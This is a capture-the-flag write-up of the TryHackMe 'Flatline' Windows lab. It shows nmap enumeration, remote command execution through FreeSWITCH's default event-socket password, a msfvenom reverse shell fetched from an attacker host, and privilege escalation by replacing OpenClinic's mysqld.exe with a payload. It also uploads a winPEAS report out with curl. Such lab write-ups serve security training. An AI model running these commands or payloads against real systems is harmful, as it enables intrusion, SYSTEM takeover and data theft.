💔Flatline - CTF Write-Up - TryHackMe

How high are your morals?

Security

RCE (Remote Code Execution)

Exploitation

Windows

Broken Permissions

TryHackMe | Flatline

Let’s add the target IP in the host file: /etc/host

sudo nano /etc/host

# Add the ip
MACHINE_IP target.local

This machine takes up some time to boot up, be patient, it took me around 20 mins to figure out it won’t respond to ping.

Enumeration

“I will hunt you down”

Let’s first start scanning the machine with Nmap first, since it does not respond to ping, we will not use traditional flags for nmap, instead, we shall use TCP scans.

nmap -sCVT -p- target.local -Pn

# This might be the following output from the scan

Nmap scan report for target.local
Host is up, received user-set (0.16s latency).
Scanned at 2023-02-03 21:26:36 IST for 363s
Not shown: 65533 filtered tcp ports (no-response)
PORT     STATE SERVICE          REASON  VERSION
3389/tcp open  ms-wbt-server    syn-ack Microsoft Terminal Services
| ssl-cert: Subject: commonName=WIN-EOM4PK0578N
| Issuer: commonName=WIN-EOM4PK0578N
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-02-02T15:35:32
| Not valid after:  2023-08-04T15:35:32
| MD5:   b737fda0e13f6d7b23b9c899a285a3b4
| SHA-1: f9ebe7c6b75232a12fdcae9bcb2493b206016b0c
| -----BEGIN CERTIFICATE-----
| MIIC4jCCAcqgAwIBAgIQGIaArMRp4bVBxn4LTtO+zjANBgkqhkiG9w0BAQsFADAa
| MRgwFgYDVQQDEw9XSU4tRU9NNFBLMDU3OE4wHhcNMjMwMjAyMTUzNTMyWhcNMjMw
| ODA0MTUzNTMyWjAaMRgwFgYDVQQDEw9XSU4tRU9NNFBLMDU3OE4wggEiMA0GCSqG
| SIb3DQEBAQUAA4IBDwAwggEKAoIBAQDe/VIy17BE60cJyuy0DmRAc5WNzM32ywhi
| nezlHDJauTM0qoRplDFH6Ma/V9FPh3SN1Zu6lpIdWbKrJyMAgoQbKLDQEa133Adm
| hmcv0HYyc3B4uSEACdBeeX1NiHm0yo0ehIe0rXYxonXLkeNFCZkNDGWYypFHed4v
| jqbsp2WgYLWwOXGcTHxgU/Hvn9173u8jeI8tnQByEsjmKwP1O4TvohgBOdfYKb9O
| 3PRWNm8rzDl4Ta7C+CmlCaUGyc+U1mTQyMgCJx+nA1v4hPYJ0ZgDOe1J5NMqxXJ+
| n2AC4F0hO+/VwVuGCn0vaLh8W0KEqoJS37yw3z7xh+SH6f16vrypAgMBAAGjJDAi
| MBMGA1UdJQQMMAoGCCsGAQUFBwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQsF
| AAOCAQEA3QJP+0ZugwkmUf/rPC0TS++1TX8y2eIqDxCLV6aQGvHUbMkFNRJfL2Qg
| 4toAbeYJfwrbmXZX1YMcTXBJKvHANKU06t6V7+YSm3HzwcVvKtHc4sOSu+tl6FxR
| sSWJAc++0wv9KjgQh+kyl5yIpI+kfbNrsF/xtTEVRfQ/SaZhlPlnklb/5a+qz8N2
| TIdalDvX65E6WYCiSLoBf+bcfzSuLu245NoNkizksXN7HSl1SjLGnIuebty0q1id
| zj9UKWQcco24ssXyMrLgY5PfI7P1y1jpAz/mR+g0ocFTk1kqzS9gAhtaAb2hUEc7
| CxFf8VS8S5mrhn51/fOXleY2JERz/w==
|_-----END CERTIFICATE-----
| rdp-ntlm-info: 
|   Target_Name: WIN-EOM4PK0578N
|   NetBIOS_Domain_Name: WIN-EOM4PK0578N
|   NetBIOS_Computer_Name: WIN-EOM4PK0578N
|   DNS_Domain_Name: WIN-EOM4PK0578N
|   DNS_Computer_Name: WIN-EOM4PK0578N
|   Product_Version: 10.0.17763
|_  System_Time: 2023-02-03T16:02:35+00:00
|_ssl-date: 2023-02-03T16:02:40+00:00; +1s from scanner time.
8021/tcp open  freeswitch-event syn-ack FreeSWITCH mod_event_socket
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 0s, deviation: 0s, median: 0s

It's intriguing that there are only a few open ports, and they seem to have tight restrictions on their functionality. One of these ports is 3389, where 'ms-bt-server' is running. A simple Google search for 'ms-bt-server' yields a helpful Nmap command that can be employed to assess its potential exploitability.

3389 - Pentesting RDP

nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 target.local -Pn

# Here is the output for the nmap enumeration via the RDP script
PORT     STATE SERVICE
3389/tcp open  ms-wbt-server
| rdp-enum-encryption: 
|   Security layer
|     CredSSP (NLA): SUCCESS
|     CredSSP with Early User Auth: SUCCESS
|_    RDSTLS: SUCCESS

It performs checks for available encryption, potential DoS vulnerabilities (without causing a DoS), and gathers NTLM Windows information, including versions.

Regarding the RDP service, the password spraying method could be an option, but we lack both a username and password in this lab environment. Caution should be exercised, as using the password spraying method in real-life scenarios without proper credentials can lead to blockages.

Instead, let's explore the FreeSWITCH service running on port 8021. FreeSWITCH is a free and open-source server software designed for real-time communication applications like WebRTC, video, and Voice over Internet Protocol (VoIP). It's versatile, compatible with Linux, Windows, macOS, and FreeBSD.

Weaponization

“Lock and Load”

A quick search in the msfconsole regarding FreeSWITCH led to some intriguing findings. If you plan to switch to that module, you'll discover that the default password being used is 'ClueCon.' Now, let's attempt to netcat the service. Given that it's a terminal-based service, this approach should work effectively.

msf> search freeswitch

# Search results might give you this particular result
#  Name                                                        Disclosure Date  Rank       Check  Description
   -  ----                                                        ---------------  ----       -----  -----------
   0  exploit/multi/misc/freeswitch_event_socket_cmd_exec         2019-11-03       excellent  Yes    FreeSWITCH Event Socket Command Execution

nc MACHINE_IP 8021

# Output
Content-Type: auth/request

ClueCon
Content-Type: text/disconnect-notice
Content-Length: 67

Disconnected, goodbye.
See you at ClueCon! http://www.cluecon.com/

Hmmm something is not right to let's try telnet

telnet target.local 8021

# Output
Trying 10.10.248.176...
Connected to target.local.
Escape character is '^]'.
Content-Type: auth/request

ClueCon
Content-Type: text/disconnect-notice
Content-Length: 67

Disconnected, goodbye.
See you at ClueCon! http://www.cluecon.com/
Connection closed by foreign host.

Let’s try something else, let's use searchsploit

searchsploit freeswitch
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                  |  Path
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
FreeSWITCH - Event Socket Command Execution (Metasploit)                                                                                                                        | multiple/remote/47698.rb
FreeSWITCH 1.10.1 - Command Execution                                                                                                                                           | windows/remote/47799.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------

Let’s use the 2nd one :

# Copy the exploit into the current directory
cp $(locate 47799.txt) exp.py

A quick cat command on exp.py revealed what needs to be done

# Syntax for the exploit
python exp.py target.local whoami

# Output
Authenticated
Content-Type: api/response
Content-Length: 25

win-eom4pk0578n\nekrotic

Since we know that this is a windows machine, let's try to get a shell first

Delivery

“Where we dropping boys?”

Let’s create an executable that can be used to get a shell on the system, we will use msfvenom for this situation

You can generate the commands from here :

Online - Reverse Shell Generator

# To generate a msfvenom shell
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=ATTACKER_IP LPORT=9999 -f exe -o reverse.exe

# Start the python webserver
python -m http.server 8080
# Deliver the exploit
python exp.py target.local 'curl http://ATTACKER_IP:8080/reverse.exe -o rev.exe'
# Start a Meterpreter session
msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter_reverse_tcp; set lhost ATTACKER_IP; set lport 9999; exploit"

# Finaly execute the exploit
python exp.py target.local 'rev.exe'

# You should be able to receive the session in msfconsole

# Switch to the shell
meterpreter> shell

Exploitation

“Access Granted”

Let’s get the flag now

C:\Users\Nekrotic\Desktop>dir

Volume in drive C has no label.
 Volume Serial Number is 84FD-2CC9

 Directory of C:\Users\Nekrotic\Desktop

09/11/2021  07:39    <DIR>          .
09/11/2021  07:39    <DIR>          ..
09/11/2021  07:39                38 root.txt
09/11/2021  07:39                38 user.txt
               2 File(s)             76 bytes
               2 Dir(s)  50,111,950,848 bytes free

# Get the flag
type user.txt
# Output
THM{64bca084_REDACTED}

Now We need to escalate Privileges else we won’t be able to get the root flag

Let’s deploy peas-ng for windows

# Deploy Peas-NG
cd C:\Users\Nekrotic
curl http://ATTACKER_IP:8080/winPEASany_ofs.exe -O win.exe
# Execute and make a report of the system
win.exe > report.txt

# Let's exfiltrate the file to get an overview of the system and what we are dealing with
# We will use curl
# It might take some time cause of file size 
curl --upload-file report.txt http://10.17.6.255:69

By the way, there is a “projects” folder in C drive that you might want to check

09/11/2021  07:18    <DIR>          projects

# Upon closer inspection we can find
Directory of C:\projects\openclinic

09/11/2021  07:29    <DIR>          .
09/11/2021  07:29    <DIR>          ..
06/04/2021  22:14               250 configureCountry.bat
01/07/2021  17:20               167 configureLanguage.bat
09/11/2021  07:29    <DIR>          jdk1.8
09/11/2021  07:18           334,840 lua5.1.dll
09/11/2021  07:19    <DIR>          mariadb
07/06/2021  15:58            93,696 OpenClinic GA login.exe
08/05/2020  11:17            27,136 OpenClinicStartServices.exe
01/05/2021  23:45               316 stopOpenClinicHttp.bat
09/11/2021  07:30    <DIR>          tomcat8
09/11/2021  07:29    <DIR>          Uninstall
09/11/2021  07:18         1,389,568 uninstall.exe
               7 File(s)      1,845,973 bytes
               6 Dir(s)  50,207,125,504 bytes free

# The user seems to be using mysql as well, later on we can check for sensitive data in the database as well if we want to.

Since we know the user is running openclinic we can search for exploits against it

Privilege Escalation

“I am inevitable”

searchsploit openclinic

# Output
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                  |  Path
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
OpenClinic GA 5.194.18 - Local Privilege Escalation                                                                                                                             | windows/local/50448.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------

# Let's see what the exploit is all about 
cat $(locate 50448.txt)

# Details
# By default the Authenticated Users group has the modify permission to openclinic folders/files as shown below.
# A low-privilege account is able to rename mysqld.exe or tomcat8.exe files located in bin folders and replace
# with a malicious file that would connect back to an attacking computer giving system-level privileges
# (nt authority\system) due to the service running as Local System.
# While a low-privilege user is unable to restart the service through the application, a restart of the
# computer triggers the execution of the malicious file.
# Any low-privileged user can elevate their privileges by abusing the MariaDB service:

Wooho!! let's see if we can get root on this machine, using the methods listed.

# Generate the payload first
msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=6969 -f exe > mysqld_evil.exe

# Inside victim machine
cd C:\projects\openclinic\mariadb\bin
# Create a backup of original mysqld.exe
ren mysqld.exe mysqld.bak
# Deploy the payload
curl http://ATTACKER_IP:8080/mysqld_evil.exe -o mysqld.exe
# Start Netcat listner on your local machine
nc -lvnp 6969
# Restart the victim computer from the previous shell
powershell Restart-Computer
# Now wait for the magic to happen

After a few moments, you shall receive the connection in your netcat listner

C:\Windows\system32>whoami
whoami
nt authority\system

# We got root
# Get the Root Flag
type C:\Users\Nekrotic\Desktop\root.txt

# Output
THM{8c8bc5558f0f_REDACTED}

Thank you for reading my post, have a great rest of your day, and good hunting 😎